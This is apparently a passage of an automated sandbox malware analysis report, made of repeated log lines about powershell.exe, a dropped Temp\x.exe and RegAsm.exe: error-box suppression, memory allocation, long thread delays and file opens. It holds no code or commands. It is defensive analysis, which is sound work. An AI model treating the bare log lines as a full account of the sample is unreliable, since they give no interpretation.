Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory allocated: C20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory allocated: 2A10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory allocated: 2910000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory allocated: 5050000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory allocated: 6050000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory allocated: 6180000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory allocated: 7180000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: C50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 28E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 2770000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3009	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Window / User API: threadDelayed 8498	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Window / User API: threadDelayed 1360	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6900	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5140	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 1912	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5760	Thread sleep count: 32 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5760	Thread sleep time: -29514790517935264s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5760	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5760	Thread sleep time: -99890s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6496	Thread sleep count: 8498 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6496	Thread sleep count: 1360 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5760	Thread sleep time: -99781s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5760	Thread sleep time: -99672s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5760	Thread sleep time: -99562s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5760	Thread sleep time: -99453s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5760	Thread sleep time: -99343s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5760	Thread sleep time: -99234s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5760	Thread sleep time: -99124s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5760	Thread sleep time: -99015s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5760	Thread sleep time: -98903s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5760	Thread sleep time: -98797s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5760	Thread sleep time: -98687s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5760	Thread sleep time: -98578s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5760	Thread sleep time: -98468s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5760	Thread sleep time: -98359s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5760	Thread sleep time: -98247s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5760	Thread sleep time: -98140s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5760	Thread sleep time: -98031s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5760	Thread sleep time: -97918s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5760	Thread sleep time: -97809s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5760	Thread sleep time: -97703s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5760	Thread sleep time: -97593s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5760	Thread sleep time: -97484s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5760	Thread sleep time: -97372s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5760	Thread sleep time: -97265s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5760	Thread sleep time: -97156s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5760	Thread sleep time: -97047s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5760	Thread sleep time: -96937s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5760	Thread sleep time: -96827s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5760	Thread sleep time: -96718s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5760	Thread sleep time: -96609s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5760	Thread sleep time: -96499s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5760	Thread sleep time: -96390s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5760	Thread sleep time: -96281s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5760	Thread sleep time: -96167s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5760	Thread sleep time: -96062s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5760	Thread sleep time: -95953s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5760	Thread sleep time: -95838s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5760	Thread sleep time: -95734s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5760	Thread sleep time: -95625s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5760	Thread sleep time: -95515s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5760	Thread sleep time: -95406s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5760	Thread sleep time: -95297s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5760	Thread sleep time: -95187s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5760	Thread sleep time: -95078s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5760	Thread sleep time: -94968s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5760	Thread sleep time: -94858s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5760	Thread sleep time: -94750s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5760	Thread sleep time: -94640s >= -30000s	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 99890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 99781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 99672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 99562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 99453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 99343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 99234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 99124	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 99015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 98903	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 98797	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 98687	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 98578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 98468	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 98359	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 98247	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 98140	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 98031	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 97918	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 97809	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 97703	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 97593	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 97484	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 97372	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 97265	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 97156	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 97047	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 96937	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 96827	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 96718	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 96609	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 96499	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 96390	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 96281	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 96167	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 96062	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 95953	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 95838	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 95734	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 95625	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 95515	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 95406	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 95297	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 95187	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 95078	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 94968	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 94858	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 94750	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 94640	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
